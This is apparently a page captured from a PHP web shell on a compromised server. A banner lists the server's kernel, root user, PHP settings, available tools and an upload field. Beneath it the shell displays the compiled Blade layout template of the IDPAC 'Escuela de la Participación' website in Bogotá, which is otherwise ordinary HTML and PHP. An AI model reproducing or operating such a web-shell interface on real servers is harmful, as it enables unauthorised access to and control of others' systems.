| Server IP : / Your IP : 10.244.4.16 [ Web Server : nginx/1.25.3 System : Linux escuela-portal-app-54f56585bc-kst6g 5.15.0-1084-azure #93-Ubuntu SMP Sat Mar 15 14:12:29 UTC 2025 x86_64 User : root ( 0) PHP Version : 8.2.13 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals, Domains : 0 Domains MySQL : OFF | cURL : ON | WGET : OFF | Perl : ON | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/app/storage/framework/views/ |
Upload File : |
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="author" content="IDPAC" />
<meta name="description"
content="Sitio web de la Escuela de la Participación del Instituto distrital de participación y acción comunal" />
<meta name="keywords"
content="Participación, cursos bogota, servicio social estudiantil, alcaldia de bogota, cursos gratuitos en bogota">
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<!-- SITE TITLE -->
<title>Escuela de la participación - IDPAC</title>
<!-- FAVICON AND TOUCH ICONS -->
<link rel="shortcut icon" href="/img/web/favicon.ico" type="image/x-icon">
<link rel="icon" href="img/web/favicon.ico" type="image/x-icon">
<link rel="apple-touch-icon" sizes="152x152" href="img/web/apple-touch-icon-152x152.png">
<link rel="apple-touch-icon" sizes="120x120" href="img/web/apple-touch-icon-120x120.png">
<link rel="apple-touch-icon" sizes="76x76" href="img/web/apple-touch-icon-76x76.png">
<link rel="apple-touch-icon" href="img/web/apple-touch-icon.png">
<link rel="icon" href="img/web/apple-touch-icon.png" type="image/x-icon">
<!-- GOOGLE FONTS -->
<link href="https://fonts.googleapis.com/css2?family=Work+Sans:ital,wght@0,300;0,400;0,700;1,300;1,400&display=swap"
rel="stylesheet">
<!-- BOOTSTRAP CSS -->
<link href="<?php echo e(asset('css/bootstrap.min.css')); ?>" rel="stylesheet">
<!-- FONT ICONS -->
<link href="https://use.fontawesome.com/releases/v5.11.0/css/all.css" rel="stylesheet" crossorigin="anonymous">
<link href="<?php echo e(asset('css/flaticon.css')); ?>" rel="stylesheet">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.1/css/all.min.css">
<link href="<?php echo e(asset('css/fontawesome-all.css')); ?>" rel="stylesheet">
<!-- PLUGINS STYLESHEET -->
<link href="<?php echo e(asset('css/menu.css')); ?>" rel="stylesheet">
<link id="effect" href="<?php echo e(asset('css/dropdown-effects/fade-down.css')); ?>" media="all" rel="stylesheet">
<link href="<?php echo e(asset('css/magnific-popup.css')); ?>" rel="stylesheet">
<link href="<?php echo e(asset('css/flexslider.css')); ?>" rel="stylesheet">
<link href="<?php echo e(asset('css/owl.carousel.min.css')); ?>" rel="stylesheet">
<link href="<?php echo e(asset('css/owl.theme.default.min.css')); ?>" rel="stylesheet">
<!-- ON SCROLL ANIMATION -->
<link href="<?php echo e(asset('css/animate.css')); ?>" rel="stylesheet">
<!-- TEMPLATE CSS -->
<link href="<?php echo e(asset('css/style.css')); ?>" rel="stylesheet">
<link href="<?php echo e(asset('css/gov.css')); ?>" rel="stylesheet">
<!-- RESPONSIVE CSS -->
<link href="<?php echo e(asset('css/responsive.css')); ?>" rel="stylesheet">
</head>
<body>
<!-- Barra de Accesibilidad -->
<div class="content-example-barra ">
<div class="barra-accesibilidad-govco">
<button id="botoncontraste" class="icon-contraste" onclick="cambiarContexto()">
<span id="titlecontraste">Contraste</span>
</button>
<button id="botondisminuir" class="icon-reducir" onclick="disminuirTamanio('disminuir')">
<span id="titledisminuir">Reducir letra</span>
</button>
<button id="botonaumentar" class="icon-aumentar" onclick="aumentarTamanio('aumentar')">
<span id="titleaumentar">Aumentar letra</span>
</button>
</div>
</div>
<?php echo $__env->make('website.layouts.partials.headerTop', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?>
<?php echo $__env->make('website.layouts.partials.sectionIdpac', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?>
<?php echo $__env->make('website.layouts.partials.navbar', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?>
<div class="content">
<?php echo $__env->yieldContent('content'); ?>
</div>
<?php echo $__env->make('website.layouts.partials.footer', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?>
<!-- EXTERNAL SCRIPTS
============================================= -->
<script src="<?php echo e(asset('js/jquery-3.3.1.min.js')); ?>"></script>
<script src="<?php echo e(asset('js/bootstrap.min.js')); ?>"></script>
<script src="<?php echo e(asset('js/modernizr.custom.js')); ?>"></script>
<script src="<?php echo e(asset('js/jquery.easing.js')); ?>"></script>
<script src="<?php echo e(asset('js/jquery.appear.js')); ?>"></script>
<script src="<?php echo e(asset('js/menu.js')); ?>"></script>
<script src="<?php echo e(asset('js/materialize.js')); ?>"></script>
<script src="<?php echo e(asset('js/jquery.scrollto.js')); ?>"></script>
<script src="<?php echo e(asset('js/jquery.countdown.min.js')); ?>"></script>
<script src="<?php echo e(asset('js/imagesloaded.pkgd.min.js')); ?>"></script>
<script src="<?php echo e(asset('js/isotope.pkgd.min.js')); ?>"></script>
<script src="<?php echo e(asset('js/jquery.flexslider.js')); ?>"></script>
<script src="<?php echo e(asset('js/owl.carousel.min.js')); ?>"></script>
<script src="<?php echo e(asset('js/jquery.magnific-popup.min.js')); ?>"></script>
<script src="<?php echo e(asset('js/register-form.js')); ?>"></script>
<script src="<?php echo e(asset('js/comment-form.js')); ?>"></script>
<script src="<?php echo e(asset('js/jquery.validate.min.js')); ?>"></script>
<script src="<?php echo e(asset('js/jquery.ajaxchimp.min.js')); ?>"></script>
<script src="<?php echo e(asset('js/accesibilidad.js')); ?>"></script>
<!-- Custom Script -->
<script src="<?php echo e(asset('js/custom.js')); ?>"></script>
<!-- HTML5 shim, for IE6-8 support of HTML5 elements. All other JS at the end of file. -->
<!-- [if lt IE 9]>
<script src="./assets/js/html5shiv.js" type="text/javascript"></script>
<script src="./assets/js/respond.min.js" type="text/javascript"></script>
<![endif] -->
<!-- Google Analytics: Change UA-XXXXX-X to be your site's ID. Go to http://www.google.com/analytics/ for more information. -->
<!--
<script>
window.ga = window.ga || function() {
(ga.q = ga.q || []).push(arguments)
};
ga.l = +new Date;
ga('create', 'UA-XXXXX-Y', 'auto');
ga('send', 'pageview');
</script>
<script async src='https://www.google-analytics.com/analytics.js'></script>
-->
<!-- End Google Analytics -->
</body>
</html>
<?php /**PATH /var/www/app/resources/views/website/layouts/app.blade.php ENDPATH**/ ?>